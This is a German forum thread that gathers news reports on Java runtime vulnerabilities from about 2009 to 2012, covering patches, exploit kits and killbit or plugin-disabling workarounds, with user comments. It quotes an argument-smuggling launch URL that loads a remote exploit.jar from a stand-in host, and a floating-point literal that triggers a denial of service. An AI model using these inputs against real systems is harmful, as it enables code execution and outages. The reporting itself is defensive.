* Integer and Buffer Overflow Vulnerabilities in the Java Runtime Environment (JRE) "unpack200" JAR Unpacking Utility May Lead to Escalation of Privileges, Advisory von Sun
Quelle : http://www.heise.de/newsticker/Sicherheitsluecke-in-Suns-Java-Umgebung--/meldung/135213
-
Sun hat Java 6 Update 17 veröffentlicht, das unter anderem mehrere Sicherheitslücken schließt. Dazu gehören diverse von präparierten Audio- und Bilddateien provozierte Buffer und Integer Overflows, durch die ein Java-Applet oder eine "Java Web Start"-Anwendungen an höhere Zugriffsrecht auf einem System erlangen kann und so etwa das System infizieren kann. Durch einen Fehler im "Java Web Start"-Installer kann es passieren, dass eine nicht vertrauenswürdige Web-Start-Anwendung trotzdem als vertrauenswürdig startet und somit höheren Rechte als erlaubt erhält. Eine Schwachstelle im Java Runtime Environment Deployment Toolkit führt dazu, dass eine Webseite Code in ein System schleusen und starten kann.
Darüber hinaus hat Sun eine Schwachstelle beim Verifizieren vom HMAC-Digests entfernt, durch die sich etwa digitale Signaturen fälschen ließen. Des Weiteren soll die JRE-Update-Funktion künftig die Laufzeitumgebung auch dann aktualisieren, wenn es sich bei der Windows-Version nicht um eine enligschsprachige Version handelt.
Einige der Fehler sind auch in der Java-Versionen 5.0, 1.4.x und 1.3.x zu finden. Sun empfiehlt dort das Update auf die Versionen 5.0 Update 22 , 1.4.2_24 beziehungsweise 1.3.1_27. Alle drei haben aber den End of Life (EOL) bereits erreicht beziehungsweise überschritten. Für Version 5 ist Update 22 die letzte Aktualisierung. Sun empfiehlt daher allen Anwendern, auf Version 6 zu wechseln, um auch weiterhin Sicherheits-Updates zu erhalten.
Quelle : www.heise.de
-
Tavis Ormandy hat eine Sicherheitslücke im Java Deployment Toolkit (JDT) unter Windows aufgedeckt, durch die präparierte Webseiten beliebige Anwendungen auf einem Windows-PC starten können. Möglich wäre beispielsweise, per FTP einen Trojaner nachzuladen und zu starten. JDT ist seit Java 6 Update 10 im Lieferumfang von Java enthalten und soll Entwicklern das Verteilen von Anwendungen erleichtern. Laut Ormandy beruht das Problem auf der ungenügenden Filterung von URLs, durch die sich beliebige Parameter an das zugrunde liegende Java Web Start (JWS) übergeben lassen. JWS selbst kann über das Java Network Launching Protocol (JNLP) externe Java-Anwendungen nachladen und in der VM ausführen.
Durch die Übergabe präparierter URLs an die Funktion launch (etwa http: -J-jar -J\\\\www.example.com\\exploit.jar none) lässt sich aber weiterer Java-Code nachladen und die Java-VM dazu bringen, darüber lokale Anwendungen mit den Rechten des Anwenders zu starten. Ormandy hat einen Demo-Exploit veröffentlicht, der die Datei calc.jar nachlädt, die wiederum über die Kommandozeile den Taschenrechner startet.
Bei einem kurzen Test der heise-Security-Redaktion öffnete sich unter Windows XP mit Java 6 Update 18 und dem Internet Explorer 8 nach kurzer Zeit der Taschenrechner. Unter Windows 7 produzierte die Java-VM unter Internet Explorer 8 nur eine Fehlermeldung. Der Exploit soll unter Windows auch mit dem Firefox-Browser funktionieren; im Test tat er es jedoch nicht.
Ormandy hat Sun (jetzt Oracle) nach eigenen Angaben über das Problem informiert. Laut seinem Bericht fand der Hersteller die Schwachstelle jedoch nicht kritisch genug, um einen Notfall-Patch außerhalb des dreimonatigen Patch-Zyklus zu veröffentlichen. Ormandy empfiehlt, bis zum Erscheinen eines Updates, für den Internet Explorer das Killbit für das ActiveX-Control des JDT zu setzen. Dies kann man entweder wie von Microsoft beschrieben per Hand tun, oder etwas komfortabler mit dem Tool AxBan. Die CLSID des betroffenen Controls lautet CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. Beim Firefox soll es helfen, über das Setzen restriktiver Rechte den Zugriff auf die Datei npdeploytk.dll zu verhindern.
Quelle : www.heise.de
-
Erste Webseiten versuchen die seit Ende der vorigen Woche bekannte Lücke in Java Web Start auszunutzen, um die Windows-PCs von Besuchern zu infizieren, berichtet der Antivirenhersteller AVG in seinem Blog. Zu den Seiten soll unter anderem die populäre Plattform songlyrics.com gehören, auf der sich die Texte aktueller Lieder herunterladen lassen. Offenbar haben Kriminelle die Webseite gehackt und Code eingebettet, der den Schadcode von einem russischen Webserver nachlädt.
Die Lücke beruht auf der ungenügenden Filterung von URLs, durch die sich mit präparierten URLs Parameter an Java Web Start übergeben lassen, mit denen lokale Anwendungen gestartet werden können. Auf diese Weise lässt sich auch Code aus dem Netz nachladen und starten.Von der Lücke ist nicht nur Windows, sondern auch Unix betroffen. Java für Mac OS X soll nicht verwundbar sein.
Analysen des Dienstes Wepawet (Details zu Wepawet im heisec-Artikel "Malware auf der Spur") zufolge versuchen die Angreifer aber nicht nur die Java-Lücke auszunutzen, sondern darüber hinaus auch noch mehrere Schwachstellen im Adobe Reader. Adobe hat erst gestern mit dem Update 9.3.2 15 Lücken im Reader geschlossen.
Aber auch für Java gibt es eine Lösung: Oracle hat das Update 20 für Java 6 (http://www.java.com/de/download/) veröffentlicht, das offenbar das Problem löst. Zumindest funktionierte nach der Installation der neuen Version der öffentliche Exploit von Tavis Ormandy mit dem Internet Explorer und Firefox nicht mehr. Damit hat Oracle überraschend schnell reagiert. Noch am Freitag berichtete Ormandy, dass der Hersteller die Schwachstelle nicht kritisch genug fand, um einen Notfall-Patch außerhalb des dreimonatigen Patch-Zyklus zu veröffentlichen. Zwar hatte Oracle gestern seinen vierteljährlichen Critical Patch Update, darin wurde Java aber nicht erwähnt.
Oracle macht in den Release Notes zu Java 6 Update 20 (http://java.sun.com/javase/6/webnotes/6u20.html) keine konkreten Angaben, was genau gepatcht wurde. Auf den ersten Blick sieht es eher so aus, als würden die verwundbaren Komponenten gar nicht erst im Browser geladen, als dass die eigentliche Lücke wirklich geschlossen wurde.
Quelle : www.heise.de
-
Das Java-Update führt offenbar nicht in allen Fällen dazu, dass der bekannte Exploit nicht mehr funktioniert. Die Ursache ist derzeit unklar. Alternativ hilft es weiterhin, beim Internet Explorer das Killbit für das verantwortliche ActiveX-Control zu setzen, beispielsweise indem man folgenden Text in der Datei kill.reg speichert und die Datei dann doppelklickt:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}]
"Compatibility Flags"=dword:00000400
Im Firefox genügt es unter Extras/Add-ons/Plugins alle Module für das Java Deployment Toolkit zu deaktivieren.
Quelle : www.heise.de
-
Nach Beobachtungen des Microsoft Malware Protection Center (MMPC) hat die Zahl der Angriffsversuche auf Java-Lücken in den vergangenen Monaten dramatisch zugenommen. Laut Holly Stewart von MMPC wurden seit Mitte des Jahres rund sechs Millionen Angriffe auf drei ältere Java-Lücken registriert. Die Zahl der Angriffe auf den in der Kategorie "häufigste angegriffene Anwendung" ehemals führenden Adobe Reader wurde damit um ein Vielfaches übertroffen.
Stewart spekuliert, dass der Einbruchsversuch über Java für Kriminelle erfolgversprechender sei, weil es wie Adobes Software nahezu überall installiert, für den Anwender aber weniger präsent ist. Anwender würden Java somit vermutlich seltener updaten – eine der ausgenutzten Lücken ist zwei Jahre alt.
Möglicherweise tragen auch Adobes Bestrebungen, den Reader sicherer zu machen, erste Früchte. Der Hersteller hatte unter anderem die Funktion für das automatische Update verbessert. Kriminellen könnten deshalb auf Java ausweichen. Dafür sprechen die Beobachtungen von Brian Krebs, der ermittelte, dass in einer Vielzahl käuflicher Angriffstools für Kriminelle Java-Exploits enthalten sind.
Oracle hatte erst vergangene Woche im Rahmen seines Oktober-Patchdays Updates für Java veröffentlicht, die insgesamt 29 Lücken verteilt über die Versionen 6.0, 5.0 und 1.4.2 für alle unterstützten Plattformen schlossen. 15 der Lücken stufte Oracle als kritisch ein.
Quelle : www.heise.de
-
Durch einen Fehler beim Konvertieren einer Gleitkommazahl kann ein Denial of Service in Java ausgelöst werden. Der Floating-Point-Bug war zuvor auch in PHP möglich.
Durch die fehlerhafte Verarbeitung der 64-Bit-Gleitkommazahl 2.2250738585072011e-308 ist es in Java möglich, einen Denial of Service (DoS) zu provozieren. Der Fehler wurde vom Studenten Konstantin Preißer entdeckt. Schuld daran ist die Konvertierung der Gleitkommazahl. Betroffen sind auch die 64-Bit-Varianten.
Zuvor wurde bekannt, dass PHP von dem Floating-Point Bug betroffen ist. Hier konnte die Gleitkommazahl ebenfalls einen Denial of Service auslösen, was jedoch zügig gepatcht wurde. Das Problem geht auf einen bekannten Fehler in Intels x87-Design zurück. Demnach tritt das Problem bei Prozessoren mit einer x87 FPU (Floating Point Unit) auf, wenn nicht explizit die Verwendung von SSE oder Float-Store erzwungen wird.
Laut einem Kommentar von Preißer auf Exploitbinary.com hatte er den Fehler schon vor drei Wochen an Oracle gemeldet - allerdings ohne eine Reaktion des Konzerns darauf.
Rekonstruieren lässt sich der Fehler sowohl im Compiler des aktuellen JDK als auch in Java-Programmen. Durch das Konvertieren der Gleitkommazahl mit Double.parseDouble tritt im Java-Paket FloatingDecimalJava.java eine Schleife auf, schreibt Preißler. Ein Patch von Oracle steht bislang aus.
Quelle : www.golem.de
-
Der Sicherheitsspezialist Sami Koivu hat eine Sicherheitslücke in Java dokumentiert , über die er Sun bereits 2008 informiert hatte. Ein Test von heise Security bestätigt seine Angabe, dass sie immer noch offen ist.
(http://www.heise.de/imgs/18/6/2/7/4/5/0/709e8d95e919c241.png)
Die Lücke betrifft den Dateiauswahl-Dialog JFileChooser; durch diese Komponente kann ein Java-Applet ohne Mitwirkung des Anwenders Dateien umbenennen. Eine leicht modifizierte Version des bereitgestellten Demo-Applets verschob mit der aktuellen Java-Version 1.6.0_23 einen Link vom Desktop in einen anderen Ordner. Mit etwas Raffinesse ließe sich durch diesen Zugriff auf das lokale Dateisystem, der unsignierten Applets eigentlich verwehrt sein sollte, deutlich schlimmeres anrichten.
Der eigentliche Skandal ist, dass Koivu den damaligen Java-Eigentümer Sun Microsystems bereits 2008 über dieses Problem informiert hat. In seinem Blog-Eintrag dokumentiert er seinen ursprünglichen Bug-Report, eine Antwort von Sun und seine Erwiderung darauf. Dieser Vorfall ist umso schwerwiegender, als Lücken in Java mittlerweile routinemäßig ausgenutzt werden, um PCs mit Schad-Software zu infizieren. Nach Beobachtungen des Microsoft Malware Protection Center war Java letztes Jahr das häufigste Angriffsziel für bösartige Web-Seiten. Man darf gespannt sein, wie lange Suns Nachfolger Oracle jetzt braucht, um einen Patch bereitzustellen.
Quelle : www.heise.de
-
Erst ist PHP darüber gestolpert, nun kommt Java ins Straucheln: Die Umwandlung des Literals "2.2250738585072012e-308" in eine Gleitkommazahl führt zu einer Endlosschleife in Java, in dessen Folge die CPU voll ausgelastet wird. Insbesondere Server-Systeme laufen damit Gefahr, aus der Ferne abgeschossen zu werden. Dazu genügt es beispielsweise, in HTTP-Request-Headern das Literal als Parameter q mitzusenden.
Oracle soll über das Problem zwar bereits seit einigen Wochen informiert sein, hat jedoch erst jetzt eine Warnung veröffentlicht (http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html). Betroffen sind Java SE und Java for Business in aktuellen und vorhergehenden Version von JDK/JRE 6, 5 und 1.4. Ein Hotfix (http://www.oracle.com/technetwork/java/javase/downloads/index.html#fpupdater) des Herstellers soll das Problem lösen, er empfiehlt es möglichst bald zu installiere, da die Informationen zum Ausnutzen der DoS-Schwachstelle bereits frei verfügbar sind. Für den 15. Februar plant der Hersteller zudem ein reguläres Update von Java.
Quelle : www.heise.de
-
Oracle hat einen außerplanmäßigen Patch für eine inzwischen zehn Jahre alte Schwachstelle in der Entwicklungsumgebung für Java zum Download freigegeben. Angreifer konnten diese Lücke für Denial-of-Service-Attacken nutzen.
Den Angaben der Entwickler zufolge war ein solche Angriff unter Umständen ohne Benutzernamen oder Passwort möglich. Gefunden wurde die besagte Schwachstelle in mehreren Versionen der Entwicklungsumgebung, heißt es in der veröffentlichten 'Sicherheitsmeldung (http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html)'.
Angeblich trat der zugrundeliegende Fehler auf, wenn der Wert "2.2250738585072012e-308" in eine binäre Gleitkommazahl konvertiert wurde. Dies hatte in vielen Fällen einen Absturz der Java-Laufzeitumgebung zur Folge.Folglich waren in erster Linie javabasierte Anwendungen und Server unter Linux, Solaris und Windows anfällig für Attacken.Erstmals gemeldet wurde der Bug in Foren für Java-Entwickler im Jahr 2001. Im November 2009 machte sodann ein weiterer Entwickler auf diese Problematik, welche von Oracle als mittelschwer eingestuft wird, aufmerksam.
Quelle : http://winfuture.de
-
Das jetzt erhältliche Update 24 von Java 6 behebt den kürzlich bekannt gegebenen Floating-Point-Bug. Bei diesem führte die Umwandlung des Literals "2.2250738585072012e-308" in eine Gleitkommazahl zu einer Endlosschleife in Java, mit der Folge, dass die CPU voll ausgelastet wird. Oracle war über den Fehler offenbar schon länger informiert und hatte in der Folge, dass zahlreiche Medien auf die Lücke hingewiesen hatten, letzte Woche einen Hotfix bereitgestellt, den es zu installieren empfahl, da die Informationen zum Ausnutzen der Schwachstelle frei verfügbar waren.
Beeinträchtigt durch die Lücke, von der zuvor auch die PHP-Skriptsprache betroffen war, waren die Java Standard Edition (Java SE) und Java for Business in aktuellen sowie vorigen Versionen des Java Development Kit (JDK) und der Java Runtime Environment (JRE) 6, 5 respektive 1.4. Im Rahmen der Veröffentlichung des neuen Updates hat Oracle auch die interne Datenbank auf die neue Version (Java DB 10.6.2.1) aktualisiert.
Quelle : www.heise.de
-
Oracle hat Java 6 Update 26 (1.6.0.26) veröffentlicht, in dem die Entwickler neun kritische Lücken in der Laufzeitumgebung geschlossen haben. Angreifer können die Lücken aus der Ferne ausnutzen, um über präparierte Java-Applets oder Java-Web-Start-Apps einen PC zu kompromittieren und unter ihre Kontrolle zu bringen. Letzteres ist laut Hersteller insbesondere unter Windows möglich, weil dort Anwender typischerweise mit Admin-Rechen arbeiten. Das Risiko etwa einer Infekton verringere sich daher beispielsweise unter Linux und Solaris.
Acht weitere Lücken hat Oracle mit einem CVS-Score zwischen 2,6 und 7,6 bewertet. Das Update lässt sich über die Aktualisierungsfunktion oder manuell installieren. Anwender sollten nicht zögern, die neue Version zu installieren, da Java unter Windows eines der beliebtesten Einfallstore für Trojaner ist. Exploits für neue Lücken werden in sogenannten Exploit-Packs regelmäßig aktualisiert.
Von den insgesamt 17 Fehlern sind auch einige im JDK 5.0 Update 29 und frühere sowie Java SE SDK 1.4.2_31 und früher zu finden. Für diese Versionen stehen aber keine Updates mehr zur Verfügung. Welche Java-Version auf dem eigenen Rechner installiert ist, kann man auf den Seiten von Oracle testen: Java-Version überprüfen (http://www.java.com/de/download/installed.jsp). Dort gibt es auch Rätschläge, wie man parallel installierte, ältere Versionen entfernt.
Quelle : www.heise.de
-
Schon im Oktober 2010 wurde dem Softwarehersteller Oracle eine Sicherheitslücke auf der offiziellen Downloadseite von Java gemeldet. Man kann dort mit Hilfe von Javascript und HTML den Inhalt fremder Webseiten einbinden, um die Besucher der ansonsten überaus vertrauenswürdigen Seite mit Schadsoftware zu verseuchen. Anbieter Oracle reagiert seit 10 Monaten auf keinen der getätigten Hinweise.
Der Berliner Senior IT Security Consultant David Vieira-Kurz hat auf der offiziellen Downloadseite von Java eine Sicherheitslücke ausfindig gemacht. Jemand anderes hatte aber schon vor fast einem Jahr auf XSSED die gleiche Lücke bekannt gemacht und das Oracle-Security-Team über den Bug informiert. Auf java.com ist es noch immer möglich, beliebige, erfundene Parameter an eine Datei zu übergeben, deren Werte im Kontext des (Gast-)Benutzers ausgeführt werden. Dies ist besonders interessant, weil die Webseite ein legitimes, vertrauenswürdiges SSL-Zertifikat besitzt und dadurch allen Besuchern sehr seriös erscheint. Diesen Umstand kann sich dort ein Angreifer zunutze machen, indem er einen präparierten Link an seine vermeintlichen Opfer schickt. Dabei kann der Angreifer laut Vieira-Kurz mehrere legitim klingende Parameter "erfinden" und aneinanderhängen, bis der Platz in der Adresszeile des Browsers befüllt ist. Außerhalb des sichtbaren Adresszeilen-Bereichs kann er dann mittels HTML und Javascript beliebige Inhalte fremder Webseiten im legitimen Kontext der Java-Downloadseite einbinden (so auch Nyan-Cat oder Rick Astley bei anderen Webseiten geschehen) und somit eigene Malware statt der aktuellen Version des Java-SDK oder der Java-Runtime Dateien zum Download anbieten. Das Opfer wird es schwer haben diesen Angriff zu erkennen, wenn derjenige vom Cyberkriminellen zum Beispiel einen veränderten Link eines Linkverkürzers wie Bit.ly erhält.
Den Proof of Concept findet man auf der Webseite von David Vieira-Kurz (http://secalert.net/post.php?id=40) und natürlich bei <xssed> (http://exit.gulli.com/url/http://xssed.com/mirror/69814/). Beide Hinweisgeber haben keine Antwort von Oracle erhalten, die Sicherheitslücke ist dementsprechend noch immer offen.
Quelle : www.gulli.com
-
Kriminelle nutzen derzeit zunehmend eine kritische Lücke in der Java-Laufzeitumgebung aus, um Rechner beim Besuch speziell präparierter Webseiten mit Schadcode zu infizieren. Laut dem renommierten Security-Blogger Brian Krebs ist das darauf zurückzuführen, dass das Arsenal des weit verbreiteten Exploit-Kits BlackHole (http://www.heise.de/newsticker/meldung/Professionelle-Exploit-Packs-frei-im-Internet-verfuegbar-1248301.html) um einen passenden Exploit ausgebaut wurde.
Durch die Lücke, die Oracle Mitte Februar gepatcht hat, kann Schadcode aus der Java-Sandbox ausbrechen und sich dauerhaft auf dem System verankern. Welche Art von Schadcode dabei injiziert wird, ist variabel. Unter anderem soll die Lücke zur Verbreitung des ZeuS-Trojaners genutzt werden.
Laut einer Analyse von Microsoft ist der Dropper in zwei Java-Klassen aufgeteilt. Die erste Klasse nutzt die Schwachstelle bei der Verarbeitung von Arrays aus, um an höhere Rechte zu gelangen und führt anschließend die Loader-Klasse aus, sich um das Herunterladen und das Installieren der Payload kümmert.
(http://www.heise.de/imgs/18/7/9/6/3/2/5/4b41f7361e7aeecc.png)
Schützen kann man sich, indem man eine der derzeit aktuellen Java-Versionen (http://www.java.com/de/download/) 6 Update 31 oder 7 Update 3 installiert. Ob und welche Version des Browser-Plugins installiert ist, erfährt man auf dieser Testseite (http://www.java.com/de/download/installed.jsp).
Allzu sicher sollte man sich jedoch selbst mit der aktuellsten Java-Version nicht fühlen: Brian Krebs berichtet von Gerüchten in Untergrundforen über einen neuen Exploit, der eine ungepatchte kritische Java-Lücke ausnutzt.
Wer auf Nummer sicher gehen will, kann Java auch komplett deinstallieren oder zumindest das Browser-Plugin deaktivieren. Letzteres dürfte sich aufgrund der stetig abnehmenden Verbreitung von Java auf die meisten Webseiten nicht auswirken.
Quelle : www.heise.de
-
(http://www.golem.de/1201/sp_89430-29287-i.jpg)
Firefox blockt anfällige Java-Versionen, um die
Nutzer zu schützen. (Bild: Mozilla)
Angriffe gegen Java-Installationen, und damit auch gegen Browser, haben in letzter Zeit wieder zugenommen. Im Security Blog erklärt Mozilla, warum alte Java-Versionen von Oracle in Firefox gesperrt wurden.
Mozilla hat sich aufgrund laufender Angriffe vor einigen Tagen dazu entschieden, ältere Versionen der Java-Laufzeitumgebung zu sperren. Bei Mozilla gingen daraufhin viele Beschwerden ein. Jetzt hat sich Mozillas Sicherheitsexperte Christian Holler dazu geäußert.
Laut Holler gab es auch Beschwerden von Firmen und Organisationen, deren Werkzeuge veraltete Java-Versionen benötigten. In einigen Fällen sei aber ein Mozilla-Bug schuld gewesen. Unabhängig davon hätten aber einige Nutzer die Gefahr durch veraltetes Java unterschätzt, und das, obwohl schon lange bekannt sei, dass Java für Angreifer ein attraktives Ziel ist.
Zu den Sicherheitslücken in Java gehöre auch eine als CVE-2012-0507 katalogisierte. Keine sechs Wochen, nachdem Oracle den Fehler beseitigt habe, sei Schadcode aufgetaucht, der Internetnutzern per Java den Zeus-Bot installiert habe. Aber offenbar hätten viele Java-Nutzer die Zeit nicht genutzt, um das kritische Sicherheitsupdate zu machen. Selbst Apple habe es nicht für nötig gehalten, die drohende Gefahr zu beseitigen. Erst vor ein paar Tagen hatte Apple eine aktuelle Version der selbstgepflegten Java-Version veröffentlicht - ohne Berücksichtigung von Altsystemen.
Anwender unterschätzen die Gefahr
"Ich werde ohnehin nicht angegriffen" ist eine der klassischen Aussagen, die Holler anführt und begründet, warum so viele kein Java-Update machen. Dabei sei das Ausnutzen der Java-Sicherheitslücken kein gezielter Angriff. In Exploit-Kits habe Schadcode längst Einzug gehalten. Die Gefahr ist laut Holler sehr wohl gegeben, wenn der Nutzer das Internet benutzt.
Bei Mozilla wird der drastische Schritt, Java zu sperren, damit gerechtfertigt, dass die Balance zwischen Sicherheit und Benutzbarkeit nicht mehr gegeben gewesen sei. Zu sehr seien Sicherheitsbedenken in der Überzahl gewesen, verglichen mit den Benutzbarkeitsproblemen durch ein abgeschaltetes Java. Der Schutz der zahlreichen Anwender sei eine Priorität gewesen, ungeachtet dessen, dass Dritthersteller-Plugins sicher nicht Mozillas Aufgabe seien.
Quelle: www.golem.de
-
JavaSE-Nutzer sollten so bald wie möglich ihre JDK- und JRE-Pakete aktualisieren, empfiehlt Oracle in den Erklärungen zu seinem heutigen Update. Es behebt 14 Sicherheitslücken, von denen 6 als besonders schwerwiegend eingestuft sind: Sie erlauben Angriffe über das Netz ohne vorherige Authentifizierung.
Zu den Details macht Oracle selbst nur wenige Angaben. Die sechs Bugs betreffen offenbar Web-Start-Anwendungen und Java-Applets, die als nicht vertrauenswürdig eingestuft sind – etwa weil sie ohne Zertifikat ausgeliefert werden oder weil die Zertifikatsprüfung gescheitert ist. Eine der Lücken könne auch, so heißt es weiter, durch das Weiterreichen von Daten an Java-APIs ausgenutzt werden, etwa per Web Service.
Mehr Informationen hält der Linux-Anbieter Red Hat in seiner Fehlerdatenbank bereit. Der jetzt beseitigte Bug CVE 2012-1723 betrifft demzufolge den Java-Hotspot-Compiler, der die Zugriffsrechte für Klassen- und Objektattribute nicht immer prüft. Dadurch könne eine spezielle Klassendefinition unter Umständen die Grenzen der Java-Sandbox durchbrechen. Die unter CVE 2012-1713 zusammengefassten Lücken finden sich im nativen Code für den Fontmanager. Eine manipulierte Schriftdatei könne dadurch die JVM abstürzen lassen oder ihren Speicherbereich so manipulieren, dass die virtuelle Maschine beliebigen Code mit ihren Rechten ausführe.
Der in der GUI-Bibliothek Swing beseitigte Bug CVE 2012-1716 hätte durch unkontrollierten Zugriff auf bestimmte Bedienelemente ebenfalls die JVM abstürzen lassen können oder das Umgehen Sandbox-Einschränkungen ermöglicht. Dieselben Folgen hat auch CVE 2012-1711 in der CORBA-Implementierung (Common Object Broker Request Architecture).
Das Update betrifft die JavaSE-Versionen 7 (Update 4 und früher), 6 (Update 32 und früher), 5 (Update 35 und früher) sowie 1.4.2_37 und früher sowie JavaFX 2.1 und früher. Es steht bei Oracle für Linux, Solaris und Windows zum Herunterladen bereit.
Für Mac OS X 10.6 und 10.7 bietet Apple ebenfalls eine aktuelle Version von Java 6 an – sie erscheint damit erstmals seit längerem gleichzeitig mit der Windows-Version. Wer auf dem Mac Java 7 aktualisieren möchte, muss aber Oracles Server bemühen, da Apple selbst Java 7 nicht anbietet. Das Apple-Update integriert eine neue Funktion, die das Java-Plug-in automatisch deaktiviert, wenn für eine gewisse Dauer keine Applets gelaufen sind.
Quelle: www.heise.de
-
Die derzeit aktuelle Java-Version enthält eine schwerwiegende Sicherheitslücke (http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html), durch man sein System beim Besuch einer speziell präparierten Webseite mit Schadcode infizieren kann. Die Lücke wird bereits aktiv ausgenutzt – bislang nur für gezielte Angriffe. Da aber ein Exploit im Umlauf ist, dürfte es nicht lange dauern, bis Cyber-Ganoven sie auch für breit angelegte Angriffswellen ausnutzen.
(http://www.heise.de/imgs/18/9/0/9/1/8/8/java-0day-ticker-s-4d7d1d534d97f5b6.png)
heise Security konnte das Problem nachvollziehen. Anhand der öffentlich zugänglichen Informationen ließ sich eine Proof-of-Concept-Seite erstellen: Beim Aufruf der Seite hat das Java-Plug-in ohne Rückfrage einen Prozess, in diesem Fall die calc.exe, ausgeführt. Statt des Taschenrechners hätte die Webseite aber auch einen Schädling herunterladen und ausführen können.
Betroffen sind alle 7er Versionen von Java. In unserem Test funktionierte der Exploit unter Windows in Verbindung mit allen verbreiteten Browsern einschließlich Google Chrome. Das widerspricht den Aussagen der Sicherheitsexperten von DeepEnd Research, laut denen sich die Schwachstelle nicht unter Chrome ausnutzen lässt. Wer Java auf seinem System installiert hat, sollte die Browser-Plug-ins umgehend deaktivieren – zumindest solange, bis Oracle einen Patch herausgibt.
(http://www.heise.de/imgs/18/9/0/9/1/8/8/firefox-disable-java-s-b84317604fd30006.png)
Generell ist es eine Überlegung Wert, das Browser-Plug-in von Java in den Ruhestand zu schicken. Schließlich ist die Wahrscheinlichkeit gering, noch auf eine Webseite zu stoßen, die Java für legitime Zwecke einsetzt. Für Webseiten, die nach wie vor unvermeidbar Java einsetzen, kann man einen Zweitbrowser bereithalten. Lokale Java-Anwendungen starten auch mit deaktivierten Plug-ins wie gewohnt.
Bei den bisher beobachteten gezielten Angriffen wird die Lücke zur Installation des Trojaner Poision Ivy genutzt. Die Malware wird dabei auf einem Server in Singapur gehostet. Oracle hat sich bislang noch nicht zu dem Problem geäußert. Daher ist noch völlig unklar, wann die Schwachstelle geschlossen wird. Das nächste reguläre Update würde erst am 16. Oktober erscheinen.
Quelle : www.heise.de
-
Also so langsam glaube ich, dass man Java grundsätzlich vom Windows-PC verbannen sollte.
Mir kommt es so vor, dass die Sicherheit von Java seit Übernahme durch Oracle stark abgenommen hat.
dvb_ss2
-
Seh ich prinzipiell auch so ...aber die Situation ist da ähnlich wie mit .NET ...diverse Programme setzen derartige Umgebungen vorraus ...
-
Naja, ich selbst habe das Problem an sich ja nicht, nutze ja schließlich Linux. ;)
Mittlerweile habe ich aber denke ich schon 8-10 PCs unter meiner Mangel gehabt, die sich den BKA-Trojaner eingefangen haben.
Dann installiert man nach Bereinigung das aktuell(st)e Java und muss nur wenige Tage später wieder von einer Riesenlücke lesen.
Nervt einfach auf Dauer.
dvb_ss2
-
Aus meinem Standard-Browser und aus meinem Lieblings-Browser habe ich die Java-Plugins längst entfernt.
Bislang habe ich dadurch nichts versäumt...
-
Ich wollte gerade das Java-Plugin entfernen, da merke ich, dass zum posten im Würfel (wenn man denn Bilder und Zitate wiedergeben will) die Java-Umgebung auf meinem PC (also unter WinVista) zwingend erforderlich ist. Hmmmm...
-
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor der Montag gemeldeten kritischen Lücke in Java; auch das US-Cert hat inzwischen ein Advisory herausgegeben. Von der Lücke betroffen sind nach derzeitigem Kenntnisstand sämtliche 7er Versionen von Java – einschließlich der derzeit aktuellen 7 Update 6. Dabei spielt es keine Rolle, unter welchem Betriebssystem und mit welchem Browser man Java nutzt.
Der ganze Artikel (http://www.heise.de/security/meldung/BSI-warnt-vor-hochkritischer-Java-Luecke-1677249.html)
Quelle : www.heise.de
-
Ich wollte gerade das Java-Plugin entfernen, da merke ich, dass zum posten im Würfel (wenn man denn Bilder und Zitate wiedergeben will) die Java-Umgebung auf meinem PC (also unter WinVista) zwingend erforderlich ist. Hmmmm...
Hier unter 7 mit Opera oder Firefox offenbar nicht.
Zumindest kein Java Browser-Plugin.
BTW, Javascript ist in diesem Sinne nicht Java und nicht vom Plugin abhängig, sondern Bestandteil des Browsers.
-
Nur für einen ganz Blöden wie mich:
1. Das "Javascript" im Firefox kann ich also unter "Erweitert\Inhalte" weiter "aktiv" lassen?
2. Die Add-Ons "Java Development..." und "Java (TM) Platform..." deaktiviere ich?
(http://www.golem.de/1208/sp_94139-42081-i.png)
Bild: Mozilla
-
1. Das "Javascript" im Firefox kann ich also unter "Erweitert\Inhalte" weiter "aktiv" lassen?
ich bevorzuge zwar die defensivere variante, und habe es standardmäßig geblockt (z.b. mit noscript), und aktiviere es nach bedarf, aber das ist richtig.
(über javascript kann man sich auch viel müll einhandeln, aber hier geht es um java)
2. Die Add-Ons "Java Development..." und "Java (TM) Platform..." deaktiviere ich?
ja
(bei mir war es übrigens schon deaktiviert, da mozilla das irgendwann mal automatisch über ein black list macht)
java ganz deinstallieren ist auch ein möglichkeit, wobei halt schon berücksichtigt werden sollte, dass es doch eine vielzahl an programmen gibt, die darauf aufbauen. viele (die größeren) liefern ein JRE mit, viele open-source programme jedoch nicht.
-
Danke Theos, das bringt mich schon weiter! :)
Ich habe es mal so gemacht, weil ohne Javascript das posten mit Bildern, etc. hier nicht geht (jedenfalls bei mir nicht) und es schon sehr anstrengend ist, beim "normalen" lesen das Ganze auszustellen und dann beim posten wieder anzumachen.
Ritchie
-
Theo hat recht, 1A erklärt.
java ganz deinstallieren ist auch ein möglichkeit, wobei halt schon berücksichtigt werden sollte, dass es doch eine vielzahl an programmen gibt, die darauf aufbauen. viele (die größeren) liefern ein JRE mit, viele open-source programme jedoch nicht.
Und selbst wenn, sollte man sich dessen bewusst sein, dass ein Update z.B. von OpenOffice nicht automatisch auch das JRE mit pflegt, ebensowenig umgekehrt.
Aber viele Funktionen von oO setzen Java voraus, weshalb das auch bei der Installation obligatorisch ist.
LibreOffice verlangt Java nicht, aber eventuell laufen dann auch wieder nicht alle Funktionalitäten.
Wer also Java auf dem Rechner installiert, sollte das bewusst tun und mindestens regelmäßig händisch updaten, zumal so auch versehentliche Mit-Installationen lästiger bis schädlicher Toolbars am sichersten zu vermeiden sind.
Ich will jetzt nicht darüber spekulieren, wie oft noch die Herrschaft über Java wechseln wird, aber wir wissen ja, dass jeder solcher Wechsel neue Risiken für die Nutzer birgt, zusätzlich zu den immer wieder bekannt werdenden Sicherheitslücken...
Jürgen
-
